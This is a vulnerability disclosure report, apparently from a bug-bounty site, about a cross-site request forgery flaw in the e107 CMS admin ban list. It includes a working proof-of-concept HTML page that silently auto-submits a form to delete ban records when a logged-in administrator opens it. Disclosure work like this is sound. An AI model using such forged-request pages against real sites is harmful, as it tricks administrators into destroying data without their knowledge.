Cross-Site Request Forgery (CSRF) in e107inc/e107
Valid
Reported on
Sep 13th 2021
✍️ Description
Attacker or malicious user is able to change delete any banning record if a logged in user visits attacker website. because lack of CSRF token "checking"
🕵️♂️ Proof of Concept
1.when you logged in open this POC.html in a browser
2.you can check unintentionally blacklist record with id = 5 are deleted (attacker can brute force to delete all blacklist items)
//POC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8181/ecms-full/e107_admin/banlist.php?mode=main&action=list" method="POST">
<input type="hidden" name="e-columns[]" value="banlist_ip" />
<input type="hidden" name="e-columns[]" value="banlist_bantype" />
<input type="hidden" name="e-columns[]" value="banlist_datestamp" />
<input type="hidden" name="e-columns[]" value="banlist_banexpires" />
<input type="hidden" name="e-columns[]" value="banlist_reason" />
<input type="hidden" name="e-columns[]" value="banlist_notes" />
<input type="hidden" name="etrigger_delete[5]" value="5" />
<input type="hidden" name="etrigger_batch" value="" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability is capable of forcing user to unintentional delete blacklist
💥 Test
Tested version is 2.3 on Firefox and safari.
💥 Fix
You should set a CSRF token on this requeset.
References
We have contacted a member of the
e107inc/e107
team and are waiting to hear back
2 years ago
to join this conversation